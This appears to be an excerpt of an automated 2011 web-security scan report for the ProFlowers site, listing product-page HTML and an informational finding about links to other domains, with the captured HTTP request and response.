"exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-White-Azalea-42580?viewpos=29&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted White Azalea" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-White-Azalea-42580?viewpos=29&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/12-Months-of-Plants-30005196?viewpos=30&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="12 Months of Plants" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/12-Months-of-Plants-30005196?viewpos=30&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/plants/Potted-Double-Stem-White-Orchid-12117?viewpos=31&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Double Stem White Orchid" border="0" /></a>
...[SNIP]...
ow" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Double-Stem-White-Orchid-12117?viewpos=31&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/wreath/Remembrance-Wreath--Preserved-1969?viewpos=32&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Remembrance Wreath - Preserved " border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/wreath/Remembrance-Wreath--Preserved-1969?viewpos=32&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/6-Months-of-Plants-30005195?viewpos=33&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="6 Months of Plants" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/6-Months-of-Plants-30005195?viewpos=33&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/plants/A-Mothers-Love-Heart-Bamboo-10519?viewpos=34&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother&#39;s Love Heart Bamboo" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/A-Mothers-Love-Heart-Bamboo-10519?viewpos=34&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-Garden-30003140?viewpos=35&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Orchid Garden" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-Garden-30003140?viewpos=35&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/3-Months-of-Plants-30005193?viewpos=36&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="3 Months of Plants" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/3-Months-of-Plants-30005193?viewpos=36&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Sun-and-Moon-Orchid-Garden-42863?viewpos=37&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sun and Moon Orchid Garden" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sun-and-Moon-Orchid-Garden-42863?viewpos=37&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Love-and-Lavender-Wreath-Preserved-30004517?viewpos=38&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Love and Lavender Wreath- Preserved" border="0" /></a>
...[SNIP]...
der="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Love-and-Lavender-Wreath-Preserved-30004517?viewpos=38&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/wreath/Herbal-Sentiments-Wreath-with-Keepsake-Book--Preserved-1453?viewpos=39&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Herbal Sentiments Wreath with Keepsake Book - Preserved" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/wreath/Herbal-Sentiments-Wreath-with-Keepsake-Book--Preserved-1453?viewpos=39&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/sympathy/Sympathy-Wreath--Preserved-589?viewpos=40&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sympathy Wreath - Preserved " border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/sympathy/Sympathy-Wreath--Preserved-589?viewpos=40&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
lick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/I-Heart-Mom-30046358?viewpos=41&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="I Heart Mom" border="0" /></a>
...[SNIP]...
"Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/I-Heart-Mom-30046358?viewpos=41&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/flowers/Spring-Morning-Bulb-Garden-30008187?viewpos=42&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom...s Morning Bulb Garden" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Morning-Bulb-Garden-30008187?viewpos=42&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=43&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Pink Calla Lily for Mom" border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=43&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Canterbury Bells Garden" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=45&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Victorian Rose Garden" border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=45&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/plants/Fragrant-Gardenia-Topiary-11846?viewpos=46&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Fragrant Gardenia Topiary" border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Fragrant-Gardenia-Topiary-11846?viewpos=46&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=47&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Yellow Rose" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=47&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
he freshest flowers, guaranteed to last at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.31. http://www.proflowers.com/mothers-day-flowers-MDF  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/mothers-day-flowers-mdf"/>
       <link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_category.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
   </head>
...[SNIP]...
<div id="innerContainer">

                       <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
